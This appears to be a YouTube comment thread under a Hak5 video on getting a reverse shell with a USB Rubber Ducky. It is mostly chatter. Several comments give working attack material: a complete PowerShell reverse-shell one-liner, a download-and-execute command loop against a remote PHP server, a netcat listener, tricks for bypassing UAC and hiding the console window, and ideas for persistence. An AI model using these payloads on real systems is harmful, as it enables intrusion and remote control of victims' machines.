Just a tip for anyone that may run into this issue like I have: When you write Ducky code to run CMD (or whatever you choose to open with the RUN command) and simulate the 'ALT + Y' key combination to select the 'Yes' button on the UAC dialog prompt, it's a good idea to follow up on the next line with a 'BACKSPACE' keystroke in the chance you're deploying onto a user's machine that has his/her UAC turned off. Otherwise, if you don't account for UAC being disabled, your first line of code typed into the CMD window will be prefixed with a 'y' character leading off (which of course throws an error and renders the whole payload useless). Pressing backspace as the first key press on a machine that does have UAC enabled will effectively do nothing at all since there's nothing to delete. It's a win-win and you don't have to deal with the irony of your attack being thwarted by someone who has disabled a feature meant to make them safer. It's like leaving your front door open only to have a thief knock himself out cold by walking into the knife edge of the opened door. Haha >.
@mitchb778 жыл бұрын
Chris Evans you legend i have been getting "y mode is not a recognised command" thanks for the info
@Cevans35358 жыл бұрын
Mitch Maguny Awesome! Glad it helped. Just a note: Pressing CTRL + C is actually quicker and easier than pressing Left Arrow + Delete. But either one works ;)
@mitchb778 жыл бұрын
Chris Evans So the next line literally reads CTRL + C ?
@Cevans35358 жыл бұрын
Mitch Maguny It would literally read CTRL C (if you're talking about the ducky code format). Here's an example screenshot of what that section of code would look like: i.gyazo.com/a295f2c5e4c46ae1c57767e95e516c4f.png
@mitchb778 жыл бұрын
Ok thanks for that i have only managed to get 2 scripts working so far.I have issues with the twin duck saving files to my drive.
@slipdipvirtualboxgaming80306 жыл бұрын
1 sticker = +0.3 CPU cores
@m4gg1975 жыл бұрын
So this guy has ca. 9999999 CPUs? 😂🤘🏼
@skselim85363 жыл бұрын
Lol😂
@kubakaktus_3 жыл бұрын
Dont' buy stickers :D Just download more RAM LOL. Or RGB 1 led +2 gpu and + 999999999 fps
@Daffyclient3 жыл бұрын
@@kubakaktus_ big brain time
@Rheaded Жыл бұрын
Skickar stickers
@0dayCTF4 жыл бұрын
Always run your listener with( nc -lvnp 8080 ), so you know you got the incoming connection. It enables verbose mode.
@megadave66852 ай бұрын
Agree, thats how i do it too
@lordgarth18 жыл бұрын
I can't help being distracted by the button presses to change cameras.
@CassianoCalegari8 жыл бұрын
You made me realize it, can't stop paying attention to it now.
@shixxx88 жыл бұрын
Lol mee to, I was noticing this 😁
@thecalabiyaumanifold7 жыл бұрын
but if he's shooting all this live with no post production editing.. mad props.
@bakralkarawi99777 жыл бұрын
Same XD
@fantasaicproductions76127 жыл бұрын
Its so cool right!??!!
@lovetodaylivetommorow28618 жыл бұрын
"These hacker stickers make it go faster" -Darren Loooooool
@Stixes8 жыл бұрын
Got the single stage payload down to a 256 char run command. \o/
@anythingandeverything2645 жыл бұрын
Cool! Please share!
@RetemVictor8 жыл бұрын
Denver is at 5280 and that airport is a circus of madness did you catch the crazy apocalypse mural in the concors...
@hak58 жыл бұрын
YES! In fact, I'm going to post some videos of it on my personal youtube page soon... That place was SO WEIRD. - Shannon (kzbin.info)
@Sifar_Secure8 жыл бұрын
Shannon Morse is the best example of nominative determinism I have seen in quite a while!
@projectcity89648 жыл бұрын
You two ROCK. I love every one of your videos. Keep it up.
@hak58 жыл бұрын
Thank you!
@danmustache75997 жыл бұрын
You are welcome. Any time I can help out.
@tomwimmenhove46525 жыл бұрын
I didn't know about the php -S thing. Neat!
@nullbyte87534 жыл бұрын
❤️😁 المشكله تاخذ وقت طويل 😁 احسن شي احسن من روبر دوكي الهندسه العكسيه باستخدام جافا و الفايربيز 😊 قريباً اكملها انشالله 😁 . ال روبردوكي يخوف المستخدم اغلب المستخدمين يخافون من نافذة الامليتور. صراحه صار 4 سنوات اتابع قناة هاك5 و هي من افضل مصادري على الانترنت و بعد قناة hak5 project 313 و بعد قناتين حلوات 😁❤️ am very thankful 🙏 to know you guys 😁❤️ from iraq
@superfatunicorn47588 жыл бұрын
when doing this the powershell window stays open, and when closed it closes the session. Is this normal, and if so, can we change the script of the powershell to change this?
@uniquelycommon22448 жыл бұрын
Very good stuff. And the Powershell-script-download-based tactic you show here is a lot more useful, from a practical standpoint, than the Mr. Robot-featured Rubber Ducky attack that you made a vid on a few weeks ago. This doesn't require the logged-in user having admin privileges, and it gets you a shell (from which you can try to do anything you like, including trying to find a way to eventually elevate your privileges to admin and then dump credential hashes). A suggestion: it would be really neat to see a vid where you use a Powershell script along with Empire, Metasploit, or another tool to install a *persisting* backdoor that gets restarted each time a user logs in and periodically reaches back to your server on a schedule of your liking to create a reverse shell or get instructions. .
@DavidBusby8 жыл бұрын
`sudo python -m SimpleHTTPServer 80` serves the current directory (`pwd` so you'll need to `cd` first), alternative to the php command as most distros are likely to already have python installed
@muhammadsyihanzhafiri42455 жыл бұрын
"python -m SimpleHTTPServer "
@shino23664 жыл бұрын
u can completely hide the CMD prompt from showing up by opening up a separate window using crtl+win+d and once the CMD is executed, u can bo back to the window and delete it... and since going back and deleting will only take like milliseconds... it won't be mostly noticible...
@NodePoint8 жыл бұрын
If you want to go mobile with Netcat, on Android you can use the netcat binary that comes with Busybox (if it's installed, that is).
@JoshuaPritt8 жыл бұрын
OMG thanks to your shirt I just realized that the toor in toorcon is root spelled backwards. I'm ashamed I didn't figure that out sooner. it might also help to actually go or look more into it.
@davidlee502 жыл бұрын
I kinda wish HaK5 would sell the bare minimum Tablet/Portable PC, but make it plug n play style. Branch Out and Expand HaK5!
@ChunkyChest8 жыл бұрын
ty .. using a Win32 API call to AttachConsole() + a WScript.Shell object ( see MSDN for docs on both ) with the Write method would allow you to exec a command stream more reliably and covertly ( unless that's what you're doing already ). If not, the problem you can run into is needing to keep the console focused. The upside is Powershell can instantiate shell objects and make Win32 API calls ;).
@LeoTakacs7 жыл бұрын
Command Prompt has actually been around since Windows 2000 because Windows 2000 was the first version of Windows to be based on the NT kernel and not the win9x kernel. All win9x version's of Windows were essentially running on top of MS-DOS, and 2000 and newer were NOT based upon MS-DOS, that's why cmd.exe exists in those OS's.
@ceticx4 жыл бұрын
is there a place to download the 20 second, first script they used at 5:00. i cant find it on their website/the rest of the internet
@lebouski8 жыл бұрын
you guys rock....thanks for the tetra , turtle and ducky....helped change my life !
@Jan.-7 жыл бұрын
How to change the keyboard layout from Arduino Mini (Pro Micro) to QWERTZ ? have problems with german (QWERTZ) keyboard layouts :c
@TopGamingStudio8 жыл бұрын
should i get a Rasbery pi 3 for kali linux?
@brockbain86568 жыл бұрын
TopGamingStudio any Pi will work, then again so will a USB jammed in a laptop with persistence
@o0julek0o8 жыл бұрын
that's what she said
@TopGamingStudio8 жыл бұрын
yes but i will be testing websites vulnerabilities and im just wondering will it be fast enough? to do anything
@gonespral8 жыл бұрын
a persistence usb with Kali installed might be a better idea
@brockbain86568 жыл бұрын
MrX Would still beat most of the rPi models...
@judgesh8 жыл бұрын
The only thing I see wrong with this is the problem with it not running as administrator. You'd need to have that same ~3 second delay to run powershell StartProcess powershell -verb RunAs then continue with downloading the PS script.
@Latrocinium086 Жыл бұрын
Man miss these episodes
@kevinrenn66114 жыл бұрын
Iv'e searched the comments for anything pertaining towards my question but can't seem to find anything! So it seems that this method relies on two conditions being true 1. The user or victim must be logged in 2. The domain this victim is connected to isn't enforcing some sort of group policy (GPO is very common amongst any competent tech team) My question is how can one install netcat on the victim machine if the target does not have any sort of admin privileges for that particular user due to GPO.
@goopey7-intros438 жыл бұрын
Anyone know where to get Darren's T-Shirt?
@rollo41276 жыл бұрын
what linux distro are you using
@GhostsPlace7 жыл бұрын
You could create a new virtual desktop or workspace (I'm not sure how it's called in windows) to hide a window
@baiqing8 жыл бұрын
Just use the back doors factory, social engineering tools and host the reverse she'll payload. It would be a Meterpreter shell that bypasses Antivirus.
@karlbergen68265 жыл бұрын
I've seen a number of videos on reverse shell. Could they be used to fix a computer with a software problem since you can see everything one it? Could they be used to modify a computer such as to install a working new operating system?
@skuldug12504 жыл бұрын
Of course not. The reverse shell is running as long as the box is connected to the internet and is constantly running the backdoor. It's not possible to install a new OS as you have to 1) go into bootloader 2) get onto the new OS and then install the OS into bootloader and drive partition. This process will involve rebooting, OS switching, to the point where you cannot use an internet-based reverse shell to do it, and the program will have to installed anew on the *nix OS or whatever OS you would like even if you tried to actually pull it off. That means you'd probably have to flash a new script for the *nix system. Long story short, it isn't going to work.
@karlbergen68264 жыл бұрын
@@skuldug1250 Your comment is interesting. Question: Could the reverse shell order an attack computer to shutdown or do a changeroot?
@skuldug12504 жыл бұрын
@@karlbergen6826 shutdown should work. chroot is a *nix operation, it's not (afaik) natively possible on windows but I also don't see the benefits of it -- what would be your goal?
@jonit72557 жыл бұрын
@gain, thank you for all this information. yall always present the info in ways I can keep attention... thank U
@MAP-SLAM3 жыл бұрын
I love the energy, you guys ae so fun to watch, cool guys doing cool stuff
@cursedmale74903 жыл бұрын
How about just enabling remote desktop, new admin user and slowing in firewall. Done and no code for defender to hit on.
@thedosiusdreamtwister15468 жыл бұрын
I managed to get the script down to 258 characters. Everything was going smoothly until I remembered "Oh yeah, you have to invoke powershell in there as well." Back up to 269 we go. Failsauce. Anyway, here's the shortened script: nal f New-Object;$s=(f Net.Sockets.TCPClient(4294967295,8)).GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(f Text.UTF8Encoding).GetString($b,0,$i);$t=([text.encoding]::UTF8).GetBytes((iex $d 2>&1));$s.Write($t,0,$t.Length)} converted variable names from 2 characters to 1 (10 characters) deleted unnecessary white spaces (2 characters) converted ip address to a 64 bit integer and removed the quotes( (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4) ) (7 characters) moved to port 8 (3 characters) switched to utf-8 encoding (2 characters) created alias f for new-object (1 character) BTW: The character cap on the windows run box is actually only 259 characters.
@someyounggamer7 жыл бұрын
That shirt is a must!
@septim23155 жыл бұрын
-Reverse shell in 3 seconds -Video is 1331 seconds long 😑
@icarusswitkes9865 жыл бұрын
r/theydidthemath
@cubicardi80114 жыл бұрын
I don't think you'd want a 3 second video. Even a 30 s video would be terrible
@atanki56824 жыл бұрын
you don't really want a 3 second video "-_-"
@etf_da12bt91 Жыл бұрын
So once the command is run and terminal is open on windows system how do you make that either nt view able or make the power shell close?
@Darkl0ud_Productions8 жыл бұрын
is shannon using a mini laptop? what is it
@redslashed3 жыл бұрын
I love your channel so much😍😍
@sundz58998 жыл бұрын
what laptops do they use?
@over00lordunknown126 жыл бұрын
10:15 *YOU DON'T NEED ACCESS TO THE **_RUN_** DIALOG BOX!!! JUST TYPE IT INTO THE START MENU!* Why do they ALWAYS do that?!...
@djAmored8 жыл бұрын
What laptop are you using for linux?
@joaofilipedelgado7 жыл бұрын
Hi Daren if you want a pretty shell just do the same for the meterpreter shell and it's more or less the same time
@dominikkisiel69452 жыл бұрын
Does the usb duck have to be permanently in the usb socket of the second computer during the connection or is it enough to insert it for a while while the script is loaded?
@licklake18 жыл бұрын
What notebook is darren using?
@gvecc34728 жыл бұрын
Looks like a Dell XPS 13
@gonespral8 жыл бұрын
Looks like a Dell XPS 13
@msven8 жыл бұрын
Not sure why people are saying "Looks like".....7:50 Either Darren is a troll or he named his laptop "xps13" because it is an XPS 13......
@gonespral8 жыл бұрын
m sven because it looks like it
@msven8 жыл бұрын
Gon Nespral I was being a little snarky....
@cwbh108 жыл бұрын
i made this 0.5 seconds
@KeyChainer8 жыл бұрын
Kryštof Píštěk it really depends on target computer. I don't know about 0.5 seconds, but lowering the initial delay is possible.
@sleazymcyeazy78927 жыл бұрын
0.1
@atanki56825 жыл бұрын
0.0 hehehehehe jk
@userou-ig1ze5 жыл бұрын
how?
@ananta21784 жыл бұрын
Hahaha
@phreaklulz8 жыл бұрын
I love the USB Ducky, But the only problem I have is the driver load time on a lot of machines, being a simple HID device, I didnt think it would have to search windows update for a driver and download it, please if their is a bypas to make the install faster let me know!
@sharpfang6 жыл бұрын
If you make this a generic keyboard, the driver should already be there.
@TopGamingStudio8 жыл бұрын
Also how can i get access to hidden directories.
@RchardSleeth3 жыл бұрын
Thoughts : jpeg with embedded nano script utilizing the single stage reverse power shell script?
@shmuelchazan8 жыл бұрын
Can't you just download the command to run? $output = ''; while($true) { $output = iex (New-Object Net.WebClient).DownloadString("0.0.0.0/get_command_to_run.php?o=$output") } get_command_to_run.php will promote the user for a command to run and then print it. then, powershell will receive that and run it. Then somehow send back the output as a parameter to the php script (I hope I did it ok, I don't know powershell) .
@menzis07 жыл бұрын
i think the point is not doing things over network but the admin user actually creating the files 'themselves'. Syntax looks about right.
@fss17047 жыл бұрын
+mikrobx you can encrypt that with vigenére algorithm easily and send it trough the network, antivirus can mostly detect sha256 decompression header, vigenére uses only an or.
@socrates0ne8 жыл бұрын
I'm pretty sure you're just joking, but if anyone is interested "faster" and "more intense" were directions George Lucas gave in the original star wars movie. He did it so much that the crew turned it into a running joke. I think they may have even made signs for Lucas, one saying "faster" and the other saying "more intense".
@pingpong11388 жыл бұрын
The powershell window never goes away which really gives it away, even if you hide it in the corner. This seems really good if all you want to do is use it to put a more stable reverse shell on it or grab one quick file.
@googlemail3692 жыл бұрын
There is a powershell command to execute files but with the -hiddenWindow arg it will launch whout a window.
@richoffremo4612 жыл бұрын
@@googlemail369 you gotta telegram or discord? Id like to ask a couple questions bout this if you don’t mind.
@Shoe_On_Head2 жыл бұрын
@@googlemail369 thanks to window header libs, was able to implement same in a cpp payload
@megadave66852 ай бұрын
@@googlemail369 can you tell me more about -hiddenWindow please?
@xugestory5 жыл бұрын
Will this give us consistent access to the computer ? Or just once?
@bruhminator84595 жыл бұрын
when you want to buy a sticker for 2:50 but it costs 40$ shipping
@PeterPan-fl1lp4 жыл бұрын
Ok I’m using nc on. My macOS Catalina terminal using the command nc -l -p 8080 . I get the error no: missing port with option -l. Any ideas on what could be going wrong?
@alemdomas2 жыл бұрын
Congratulations !!! Made In Brazil - :-)
@xetronchan10597 жыл бұрын
If we use the faster way, it needs to download something from a website (in this video Darren's PHP server), which is a concern that already stated at the very beginning of the video isn't it? So if I understand correctly this means we can't get both advantage of high-injection-speed and high-success-chance right? Its a trade-off like, either 1)I sacrifice chance of success by having fast injection through downloading PS script, or 2) do this without downloading the PS script to have a higher chance, but with slower-injection.
@andropchax38468 жыл бұрын
FASTER AND MORE INTENSE!!! xD
@JonMichaelDeBona6 жыл бұрын
That's what she said.
@KenDogNI8 жыл бұрын
SMA sockets on a tin box is good, gives the RF signal a better ground plane..
@rishikreddy45264 жыл бұрын
video title : How to Get a Reverse Shell in *3 Seconds* with the USB Rubber Ducky video time : 22 minutes, 11 seconds. me : BURH -_-
@salacryl2 жыл бұрын
Question: How does this work if powershell is in Contrained Language mode?
@aakashjana62255 жыл бұрын
Will use rubber ducky work if used is blocked on the computer??
@a.a19403 жыл бұрын
Can I use an autorun usb with power shell scripts
@lewis19026 жыл бұрын
...and what might you do if Run is disabled?
@inspirationeveryday11753 жыл бұрын
what is the importtant of getting reverse shell ?
@KennySpark85742 жыл бұрын
Where can you get this payload?
@leocapuzzi4 жыл бұрын
Cool to see that Chad Kroeger finally gave up on Nickelback
@goopey7-intros438 жыл бұрын
Did this faster than the speed of light
@xxrobloxprogamerxx1803 жыл бұрын
No the light speed isn't a time measure stuped imagine being a remote access trojan
@over00lordunknown126 жыл бұрын
*So I have a question:* If you don't have access to admin CMD, you can just use regular and write it to the user or temp directory, right? Okay, then, the firewall might block it, but if it is just communicating on the LAN, then the network is set to "Trusted" by default, right? So no privileges needed?
@badpixelproductions84378 жыл бұрын
would using msfvenom to make a payload, and then emailing it to the victim via a fake email account, and then using the msfconsole to use an exploit to the activate the payload be practical?
@Fractal2278 жыл бұрын
Faster and more intense. Put some rubber on it(^.-) (-.^) (^.^) On another note, how would you connect to the reverse shell? What would you define as your end point. Sending it directly to your own equipment at your house isint very sneeky, so if we think "bad hackers" here. Would you than use a "barrowed" credit card to connect to some encrypted GSM equipment paid with that card and forward the connection to yourself or what ideas comes to mind?
@kornbread53594 жыл бұрын
Do ports exist physically or are they just software mechanisms?
@skuldug12504 жыл бұрын
Well, sure, you have USB ports and such. But mainly ports are pretty much "addresses"/communication endpoints which apps can listen on (which means that when packets arrive dedicated to a specific port they get easily forwarded to the application listening on the port). So 80 is the standard port for internet traffic, and a packet traveling over the internet would have xxx.xxx.xxx.xx:80 as the destination. In fact, if you were to use an encrypted reverse shell, setting it to port 80 is a great idea because that port is always open, and the encrypted binaries just look like random passing by data. Very sneaky...
@fsnd79543 жыл бұрын
can i make my flash drive to be usb rubber ducky ? if yes can u give me a link to a paper or information like that
@rmp5s7 жыл бұрын
What is that thing Shannon is on?
@chloealaska31403 жыл бұрын
What laptop do you use?
@baiqing7 жыл бұрын
You could use the social engineering toolkit "SET" and setup a reverse https meterpreter shell.
@williamcornell35997 жыл бұрын
if stickers make it faster, then I need a lot of them
@WeirdWolf8 жыл бұрын
Does somebody know how to utilize the Ducky on an Android phone? None of the payloads i found work for me, neither do any shortcuts for physical keyboards connected to Android. If anybody has a working payload for Android (any kind really), would you mind pointing me to it? Or did Android remove some HID funtionality in any newer version?
@sharpfang6 жыл бұрын
First, attach the ducky through a USB OTG adapter or you achieve nothing connecting USB slave to USB slave. Then, Android doesn't provide neat keyboard shortcuts. You may have your ducky emulate a keyboard and a mouse, and use the mouse to click things... except every phone will have things elsewhere as people install different things and the icons are in random places. Your best bet is to emulate a USB to serial converter, hope the phone has debug options enabled (or try enabling them through mouse clicks) and use ADB shell that will then appear over USB-as-RS232
@rasprosecutor8 жыл бұрын
First computerphile puts out a video about malware, then you guys? Now you're making me want to get back into the hacking game...
@chrislavers77267 жыл бұрын
Heya, I rly want to do this to prank my friend but I am scared I am going to damage my friends laptop. Is there a way where I can remove the reverse shell on his pc, if so can I do it remotely ?
@nagarathnagopal68983 жыл бұрын
Can u make a video on hiding payloads in image files for reverse shell
@m.whitmore19747 жыл бұрын
Ok, where did he get the shirt? I got to get one.
@tracash66823 жыл бұрын
RICKROLL YOUR CLASSROOM WITH THIS
@williamcornell35997 жыл бұрын
what is that clamshell thing Shannon has?
@jwadaow5 жыл бұрын
lol
@CallousCoder2 жыл бұрын
Only Darren, GenX and Boomer programmers no the pain of squeezing out bytes in your code to make it fit 😅 I love those days where you had to think about cycles and/or memory usage. Eventhough 64K was enormous!
@jasonperry60468 жыл бұрын
Disk OS...... What happened to dirty operating system
@fstfstsolutionsrl76165 жыл бұрын
I bought the duck and with the taxes and the tax I spent € 100.00 fixed red led light, I looked on their help site and I didn't solve it, I asked them for help via email, but only one answer they gave me saying that I would have contacted the assistance service .... € ... 100.00 thrown away. thank you
@madscientist0575 жыл бұрын
Aren't these power shell scripts mitigated by a good group policy that prevents users from running power shell let alone that downloadstring command
@BicospaceTech2 жыл бұрын
you guys so dope !!
@sebasq1096 жыл бұрын
¿Why is the JAVA -jar XXXX command for?
@mertkocer25072 жыл бұрын
could someone help with the r.ps1 part i cant host it
@Aralmo6403 жыл бұрын
Nice! I did something similar with an arduino nano iot with a led screen to "hack" wifi passwords easily. I would connect it to usb and use it as a keyboard to get the current connected wifi, list the password with key clear and send it back through COM to be shown in the LCD. Just for the fun of seeing your friends face when you ask to connect to the wifi and instead of asking for the key you ask to connect that stuff full of dupont cables in a test board to the USB to get it XDDDDDD
@valentinnavarro29656 жыл бұрын
I need to compile a duckyscript txt file that I wrote originally for my USB Rubber Ducky. But now I need to find a way to run the script as an exe file locally. ¿How can I make this posible? ¿How can I compile the script to an exe file?
@Hello-ih4rn8 жыл бұрын
Couldn't you just create the executeable from typing the text you would get if you would of opened it in notepad?
@ghost-x8h5 жыл бұрын
Haha I always rep and tag you guys on social media for thousands and thousands to see 😊 I would scream in excitement if I ever won anything from you guys 😂
@hack-talk90982 жыл бұрын
Why should you pre-install the setup when you need to take us through
@insanemainstream36333 жыл бұрын
Any advice on a good reliable Linux laptop? Needs to be portable. ty all
@noyes67583 жыл бұрын
Any windows works because of its wsl feature which is like a less laggy vm. Otherwise, idk a laptop, just get one with ubuntu if it’s gonna be a day to day use, and get kali for pentesting
@DanielPradoBurgos8 жыл бұрын
Awesome channel!!! Keep it up! And btw.... Y U NO USE VIM??? :P